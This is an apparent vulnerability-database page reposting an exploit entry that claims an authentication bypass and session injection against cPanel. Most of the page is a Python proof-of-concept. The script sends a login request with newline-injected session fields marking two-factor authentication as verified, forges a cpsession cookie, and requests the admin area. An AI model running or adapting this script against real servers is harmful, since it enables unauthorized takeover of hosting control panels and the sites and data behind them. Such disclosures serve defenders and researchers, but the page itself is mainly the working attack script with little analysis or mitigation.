PACKETSTORM 9.8 CRITICAL

📄 cPanel Authentication Manipulation / Session Injection_PACKETSTORM:220249

May 4, 2026 invoker category_exploit
9.8 / 10
CRITICAL
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Description

This Python script attempts to an authentication bypass against a cPanel login endpoint by crafting a modified login request and manipulating session-related data. Versions after 11.40 are affected...
Visit Original Source

Basic Information

ID PACKETSTORM:220249
Published May 4, 2026 at 00:00

Affected Product

Affected Versions ==================================================================================================================================
| # Title : cPanel versions after 11.40 Authentication Manipulation Session Injection |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.cpanel.net |
==================================================================================================================================

[+] Summary : This Python script attempts to an authentication bypass against a web login endpoint by crafting a modified login request and manipulating session-related data.

[+] POC :


import requests
import urllib3
import sys
import time

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def final_badr_bank_bypass(target):
target = target.rstrip('/')
login_url = f"{target}/login/"
magic_token = "indoushka"

server_ts = int(time.time())

headers = {
"Content-Type": "application/x-www-form-urlencoded",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/125.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
}

payload = (
f"user=admin\ncp_security_token={magic_token}\n"
f"tfa_verified=1\nsuccessful_external_auth_with_timestamp={server_ts}"
f"&pass=security_audit_2026"
)

print(f"[*] Target: {target} | Attempting to exploit Status 200...")

try:
session = requests.Session()

inject_resp = session.post(login_url, data=payload, headers=headers, verify=False)
print(f"[+] Injection Step: {inject_resp.status_code}")

session.cookies.set("cpsession", f":{magic_token}", domain=target.split('//')[-1].split(':')[0])

admin_url = f"{target}/cpsess{magic_token}/main.html"
print(f"[*] Accessing Admin Area with injected session: {admin_url}")

final_resp = session.get(admin_url, verify=False, timeout=10, allow_redirects=True)

if final_resp.status_code == 200:
print("[!!!] SUCCESS:Session Promotion Achieved!")
elif "Invalid" in final_resp.text or final_resp.status_code == 401:
print("[-] Promotion Denied: Session is poisoned but integrity check rejected it.")
else:
print(f"[-] Final Status: {final_resp.status_code}. (Possible WAF interference)")

except Exception as e:
print(f"[X] Error: {e}")

if __name__ == "__main__":
target_addr = sys.argv[1] if len(sys.argv) > 1 else "https://cpanel.127.0.0.1dz:2083"
final_badr_bank_bypass(target_addr)


Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================

💭 Join the Security Discussion

🔒 Your email address will not be published. Required fields are marked *

⚠️ Please be respectful and constructive in your comments. Security discussions should remain professional.